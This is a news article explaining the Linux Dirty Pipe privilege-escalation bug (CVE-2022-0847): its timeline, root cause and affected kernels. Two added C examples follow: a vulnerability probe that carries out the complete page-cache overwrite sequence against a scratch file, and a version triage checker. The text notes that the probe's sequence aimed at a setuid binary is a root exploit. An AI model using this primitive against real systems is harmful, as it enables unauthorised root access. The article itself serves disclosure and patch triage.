New Linux bug allows elevated privileges and arbitrary code execution

21-03-2022 | By Robin Mitchell

Linux is a powerful and popular operating system used extensively in mobile, IoT and server devices. A new vulnerability has been disclosed, and it is essential that affected systems are upgraded: the flaw lets an unprivileged local user overwrite files they can only read, and from there escalate privileges and execute arbitrary code.


What does the newly discovered bug allow?


The root cause was tracked down by Max Kellermann, who first noticed its symptoms (corrupted web-server log files) in April 2021 but only traced them to the kernel in February 2022. As is usual for kernel security bugs, the report, the fix and the public announcement were staggered: Kellermann reported it to the kernel security team on 20 February 2022, fixed kernels were released on 23 February 2022, and his write-up was published on 7 March 2022, giving distributions time to ship the fix first. The bug, CVE-2022-0847 and widely known as Dirty Pipe, affects Linux 5.8 and later and is fixed in 5.16.11, 5.15.25 and 5.10.102.

The bug stems from the kernel's handling of pipe buffers and the page cache. It lets a local user with no administrative privileges overwrite the cached contents of any file they can open for reading, including setuid-root executables, and overwriting such a binary's cached pages is enough to run arbitrary code as root; that is the privilege-escalation path the headline refers to.

Without going into too much detail (Max Kellermann's write-up has the full analysis), the bug is that the kernel did not initialise the flags of a pipe buffer when splice() inserted a page-cache page into a pipe. Since Linux 5.8 one of those flags, PIPE_BUF_FLAG_CAN_MERGE, tells the pipe write path that it may append new data to the page held by the last buffer instead of allocating a fresh one. A rogue program can therefore create a pipe, fill it completely with ordinary writes (every slot of the pipe's ring now carries CAN_MERGE), drain it again (the pages are released but the flags are not reset), open a read-only file and splice() at least one byte from it into the pipe (the new buffer points at the file's page-cache page and inherits the stale flag), and then write arbitrary data into the pipe. The kernel appends that data directly into the page-cache page of the file.

Draining the pipe is not itself the fault: releasing a buffer has never cleared its flags. Before 5.8 that was harmless because whether a buffer could be merged into was a property of its operations pointer, which every code path set explicitly; 5.8 moved that decision into the flags word, and the splice path was never updated to initialise it. The practical result is that a plain write() to a pipe can modify the cached contents of a file the process holds read-only. The write cannot cross a page boundary, cannot start at the first byte of a page (at least one spliced byte must precede it) and cannot grow the file, and the page is not marked dirty, so the change lives in the page cache rather than on disk; but every process that reads the file sees it until the page is evicted.
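The sequence above, written as a self-test rather than an attack: the program creates its own scratch file in /tmp, reopens it read-only, runs the fill, drain, splice and write steps against it, and reports whether the written bytes appeared in the file. This is an added example, not code from the article or Kellermann's published proof of concept. It assumes Linux (splice() is invoked through syscall() so that no feature macro is needed), a writable /tmp and a default pipe capacity reported by F_GETPIPE_SZ; the file name, contents and payload are constructed for the demonstration.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>

#ifndef F_GETPIPE_SZ
#define F_GETPIPE_SZ 1032           /* F_LINUX_SPECIFIC_BASE + 8 */
#endif

/* Steps 1 and 2: fill the pipe completely with ordinary writes, then drain
 * it. Every slot of the pipe ring has now held an anonymous buffer flagged
 * PIPE_BUF_FLAG_CAN_MERGE, and releasing those buffers does not clear the
 * flag. Returns 0 on success, -1 on error. */
static int prime_pipe(int p[2])
{
    static char scratch[4096];
    long size = fcntl(p[1], F_GETPIPE_SZ);   /* usually 16 pages (65536) */
    if (size <= 0)
        return -1;
    for (long left = size; left > 0; ) {
        long n = left < (long)sizeof scratch ? left : (long)sizeof scratch;
        if (write(p[1], scratch, (size_t)n) != n)
            return -1;
        left -= n;
    }
    for (long left = size; left > 0; ) {
        long n = left < (long)sizeof scratch ? left : (long)sizeof scratch;
        if (read(p[0], scratch, (size_t)n) != n)
            return -1;
        left -= n;
    }
    return 0;
}

/* Run the Dirty Pipe sequence against a scratch file this process created
 * and owns (constructed input), so the outcome is harmless either way.
 * Returns 1 if bytes written to the pipe ended up in the file's page cache
 * through a read-only descriptor (kernel vulnerable), 0 if the kernel
 * allocated a fresh pipe buffer as it should (kernel fixed), -1 on error. */
int dirty_pipe_probe(void)
{
    static const char original[] = "AAAAAAAA";
    static const char payload[]  = "XXX";
    char path[] = "/tmp/dirtypipe-probe-XXXXXX";   /* hypothetical scratch name */
    char back[sizeof original] = {0};
    int result = -1, p[2] = {-1, -1};

    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    if (write(fd, original, 8) != 8) { close(fd); unlink(path); return -1; }
    close(fd);

    /* Step 3: the target is opened read-only; no write permission is used. */
    int ro = open(path, O_RDONLY);
    unlink(path);                    /* the inode lives on while ro is open */
    if (ro < 0)
        return -1;

    if (pipe(p) == 0 && prime_pipe(p) == 0) {
        /* Step 4: splice one byte of the file into the pipe. The new pipe
         * buffer points at the file's page-cache page, and on an unfixed
         * kernel its flags word still says CAN_MERGE. */
        long long off = 0;
        long n = syscall(SYS_splice, ro, &off, p[1], (void *)0, (size_t)1, 0U);
        /* Step 5: an ordinary write. With CAN_MERGE set the kernel appends
         * the bytes into that page-cache page at file offset 1 instead of
         * allocating a new buffer; reading the file back shows which. */
        if (n == 1 && write(p[1], payload, 3) == 3 &&
            lseek(ro, 0, SEEK_SET) == 0 && read(ro, back, 8) == 8)
            result = memcmp(back + 1, payload, 3) == 0 ? 1 : 0;
    }
    if (p[0] >= 0) { close(p[0]); close(p[1]); }
    close(ro);
    return result;
}

int main(void)
{
    int r = dirty_pipe_probe();
    if (r < 0)
        perror("probe failed");
    else
        printf("kernel %s CVE-2022-0847\n",
               r ? "is VULNERABLE to" : "is not affected by");
    return r < 0 ? 2 : r;
}
```

On a fixed kernel the final write() lands in a new pipe buffer and the file still reads back as "AAAAAAAA"; on an unfixed 5.8 to 5.16.10 kernel it reads "AXXXAAAA" even though the process never held the file open for writing. The probe writes only to a file it created, so it is safe to run on production hosts; the same sequence aimed at a setuid binary is the exploit.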


What devices are vulnerable?


It is hard to determine how many devices are vulnerable, but any system running a kernel from 5.8 up to, but not including, the fixed releases mentioned above is exposed. Two caveats apply to that version test. First, distributions ship backported fixes under their own version strings, so an Ubuntu or Red Hat kernel reporting 5.15.0 may well be patched; check the vendor advisory rather than the upstream number. Second, this is a local privilege escalation: the attacker must already be able to run code on the device, for instance through a separate remote flaw or a malicious app. Android phones on 5.10 kernels, such as the Pixel 6, were among the affected devices. Considering how many IoT devices run Linux, there may be millions of units worldwide that remain vulnerable, made worse by the fact that such devices can be hard to update depending on where they are installed and whether their owners even know an update is needed.
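A first-pass triage of the version window described above, as an added example (not code from the article): it classifies an upstream kernel release string against the affected range, treating the end-of-life branches in between (5.8, 5.9 and 5.11 to 5.14) as never fixed, and reads the running kernel's version via uname(). The stable branch rules are the three fixed releases named on this page; the classification is assumed to be upstream-only and says nothing about vendor backports, so an "affected" answer for a distribution kernel means "check the advisory", not "exploitable".

```c
#include <stdio.h>
#include <sys/utsname.h>

/* Classify an upstream kernel release string against the CVE-2022-0847
 * window: introduced in 5.8, fixed in 5.10.102, 5.15.25 and 5.16.11, and
 * in 5.17 and later. The branches in between (5.8, 5.9, 5.11 to 5.14) were
 * already end-of-life when the fix shipped, so no patch level of those is
 * fixed upstream. Release candidates (5.17-rc1 to rc5) are not modelled.
 * Returns 1 = affected, 0 = not affected, -1 = unparseable. */
int dirty_pipe_version_affected(const char *release)
{
    int major = 0, minor = 0, patch = 0;
    if (sscanf(release, "%d.%d.%d", &major, &minor, &patch) < 2)
        return -1;
    if (major != 5 || minor < 8 || minor >= 17)
        return 0;            /* 4.x predates the bug; 5.17+ and 6.x carry the fix */
    switch (minor) {
    case 10: return patch < 102;
    case 15: return patch < 25;
    case 16: return patch < 11;
    default: return 1;       /* EOL branch: no fixed release exists upstream */
    }
}

int main(void)
{
    struct utsname u;
    if (uname(&u) != 0) {
        perror("uname");
        return 2;
    }
    int r = dirty_pipe_version_affected(u.release);
    printf("%s: %s\n", u.release,
           r < 0 ? "cannot parse version"
         : r     ? "upstream number inside affected range (check vendor backports)"
                 : "not affected upstream");
    return 0;
}
```

Distribution kernels such as "5.15.0-76-generic" parse as 5.15.0 and come out as affected even though the vendor fix was backported long ago; that is the intended conservative behaviour for a triage script, and the vendor advisory is the authority for those.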

Of course, this vulnerability doesn't affect kernels older than 5.8, but the disadvantage of an older kernel is that it may carry many other bugs that have since been fixed in 5.8 and above. Since Linux 5.8 is relatively new (released in August 2020), only devices shipped with that kernel or later, or upgraded to it, are exposed; a device that cannot update itself without user intervention will stay that way.


Does this bug support the concept of customised operating systems in IoT devices?


This is not the first time Linux, and the software that depends on it, has seen a flaw that leaves millions of devices at risk. This bug doesn't demonstrate that Linux is a flawed system that should be avoided; every operating system, Windows included, contains vulnerabilities. If anything, the speed with which the fix was developed and released under embargo shows one advantage of open-source software.

However, this bug does provide an argument against using publicly available software in IoT devices and in systems handling critical infrastructure. IoT devices in the home often control doors, windows and air conditioning, which, if compromised, could give an attacker access to personal data and control of the home. That is intrusive and potentially damaging, but a criminal with access to the infrastructure that controls power stations and water lines could bring mayhem to millions.

As such, devices used in infrastructure and national defence should consider platforms designed from scratch with only the absolutely necessary services running. It may be easier to build a power grid controller on Linux, but in terms of security it would arguably be safer to use a purpose-built closed-source system that the public does not have access to.

Of course, purpose-built systems introduce their own flaws through inexperienced programming (remember that Linux is developed by a community of thousands of seasoned kernel engineers), and details of a closed-source design can leak accidentally. A vulnerability in such a system may then be known to a handful of attackers and exploited at any time, with no warning and no wider community to find and fix it first.



By Robin Mitchell

Robin Mitchell is an electronic engineer who has been involved in electronics since the age of 13. After completing a BEng at the University of Warwick, Robin moved into the field of online content creation, developing articles, news pieces, and projects aimed at professionals and makers alike. Currently, Robin runs a small electronics business, MitchElectronics, which produces educational kits and resources.